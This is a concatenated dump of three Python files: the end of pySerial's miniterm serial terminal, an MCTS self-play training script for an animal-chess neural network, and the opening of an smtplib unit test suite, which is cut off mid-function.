r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
mcts.py | import torch, math, os
import numpy as np
import pickle, collections, time
from utils import load_net
from tqdm import tqdm
from animal_chess_pymodule import *
from alpha_zero_net import ChessNet
import torch.multiprocessing as mp
class Node():
MAX_ACTION = 252
def __init__(self, game, move, parent = None):
self.is_expanded = False
self.parent = parent
self.game = game
self.move = move
self.children = {}
self.child_priors = np.zeros([Node.MAX_ACTION], dtype=np.float)
self.child_total_value = np.zeros([Node.MAX_ACTION], dtype=np.float)
self.child_number_visits = np.zeros([Node.MAX_ACTION], dtype=np.float)
self.action_idxes = []
@property
def number_visits(self):
return self.parent.child_number_visits[self.move]
@number_visits.setter
def number_visits(self, value):
self.parent.child_number_visits[self.move] = value
@property
def total_value(self):
return self.parent.child_total_value[self.move]
@total_value.setter
def total_value(self, value):
self.parent.child_total_value[self.move] = value
def child_Q(self):
return self.child_total_value / (self.child_number_visits + 1)
def child_U(self):
return math.sqrt(self.number_visits) * (abs(self.child_priors)
/ (1 + self.child_number_visits))
def best_child(self):
if self.action_idxes != []:
bestmove = self.child_Q() + self.child_U()
bestmove = self.action_idxes[np.argmax(bestmove[self.action_idxes])]
else:
bestmove = np.argmax(self.child_Q() + self.child_U())
return bestmove
def maybe_add_child(self, move):
if move not in self.children:
self.children[move] = Node(self.game, move, parent=self)
return self.children[move]
def select_leaf(self):
current = self
while current.is_expanded:
best_move = current.best_child()
current.game.move_chess(best_move)
current = current.maybe_add_child(best_move)
return current
def add_dirichlet_noise(self):
valid_child_priors = self.child_priors[self.action_idxes] # select only legal moves entries in child_priors array
valid_child_priors = 0.75*valid_child_priors + 0.25*np.random.dirichlet(np.zeros([len(valid_child_priors)], dtype=np.float32)+192)
self.child_priors[self.action_idxes] = valid_child_priors
def expand(self, child_priors):
self.is_expanded = True
self.action_idxes = self.game.generate_all_steps()
if self.action_idxes == []:
self.is_expanded = False
self.child_priors = child_priors
mask = np.ones(len(self.child_priors), np.bool)
mask[self.action_idxes] = False
self.child_priors[mask] = 0.0
# if isinstance(self.parent, DummyNode): # root
self.add_dirichlet_noise()
def backup(self, value_estimate: float):
current = self
while current.parent is not None:
current.number_visits += 1
if current.game.role() == Role.BLACK: # same as current.parent.game.player = 0
current.total_value += (1*value_estimate) # value estimate +1 = white win
elif current.game.role() == Role.RED: # same as current.parent.game.player = 1
current.total_value += (-1*value_estimate)
if not isinstance(current.parent, DummyNode): # root
current.game.undo_move()
current = current.parent
def get_policy(self):
policy = np.zeros(Node.MAX_ACTION)
for idx in np.where(self.child_number_visits!=0)[0]:
policy[idx] = self.child_number_visits[idx]/self.child_number_visits.sum()
return policy
class DummyNode(object):
def __init__(self):
self.parent = None
self.child_total_value = collections.defaultdict(float)
self.child_number_visits = collections.defaultdict(float)
def UCT_search(game_state, times, net):
root = Node(game_state, move=None, parent=DummyNode())
for i in (range(times)):
leaf = root.select_leaf()
# print('leaf step count = ', leaf.game.get_step_count());
encoded_s = torch.from_numpy(np.array(leaf.game.encode_board())).float()
if torch.cuda.is_available(): encoded_s = encoded_s.cuda()
child_priors, value_estimate = net(encoded_s)
value_estimate = value_estimate.item()
if leaf.game.check_win() is not None: # if checkmate
if leaf.game.check_win() == Role.RED:
leaf.backup(1)
else:
leaf.backup(-1)
continue
child_priors = child_priors.detach().cpu().numpy().reshape(-1)
leaf.expand(child_priors) # need to make sure valid moves
leaf.backup(value_estimate)
return np.argmax(root.child_number_visits), root.get_policy()
def worker(iter, num_games, net, workid = 0):
for n in tqdm(range(num_games)):
# board = Board('2L3t/1d3c1/r1p1w1e/7/7/7/E1W1P1R/1C3D1/T3l2 w')
board = Board()
checkmate = False
dataset = []
value = 0
move_count = 0
while not checkmate:
elapse = time.perf_counter()
best_move, policy = UCT_search(board, 1400, net)
elapse = time.perf_counter() - elapse
encoded_s = np.array(board.encode_board())
dataset.append([encoded_s, policy])
print("=============")
print("[workid:{}] elapse = {:.3f}s move_count = {} dup_times = {}".format(workid, elapse, move_count, board.get_dup_count()))
print(board)
print("best_move = {} ({})".format(board.decode_move(best_move), best_move))
board.move_chess(best_move)
win_status = board.check_win()
if win_status is not None:
print("[workid:{}] game end! dup_times = {}".format(workid, board.get_dup_count()))
print(board)
if win_status == Role.BLACK:
value = -1
else:
value = 1
checkmate = True
move_count += 1
print("iter {} checkmate {} value = {}".format(iter, checkmate, value))
# if not checkmate: continue
dataset_pv = []
for idx, data in enumerate(dataset):
s, p = data
if idx == 0:
dataset_pv.append([s, p, 0])
else:
dataset_pv.append([s, p, value])
with open('./datasets/iter{}/dataset_{}.pkl'.format(iter, int(time.time() * 1000)), 'wb') as f:
pickle.dump(dataset_pv, f)
def MCTS_self_play(iter, num_games, workers = 1):
if not os.path.exists('datasets/iter{}'.format(iter)):
os.makedirs('datasets/iter{}'.format(iter))
net = load_net(iter)
if workers > 1:
net.share_memory()
mp.set_start_method("spawn",force=True)
net.eval()
if workers > 1:
process = []
for i in range(workers):
w = mp.Process(target=worker, args=(iter, num_games, net, i))
w.start()
process.append(w)
for w in process:
w.join()
else:
worker(iter, num_games, net)
|
test_smtplib.py | import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import HOST
from test.support import threading_setup, threading_cleanup, join_thread
from test.support import requires_hashdigest
from unittest.mock import Mock
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Capture SMTPChannel debug output
self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
smtpd.DEBUGSTREAM = io.StringIO()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
decode_data=True)
# Keep a note of what server host and port were assigned
self.host, self.port = self.serv.socket.getsockname()[:2]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
# restore sys.stdout
sys.stdout = self.old_stdout
# restore DEBUGSTREAM
smtpd.DEBUGSTREAM.close()
smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = support.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=3, source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
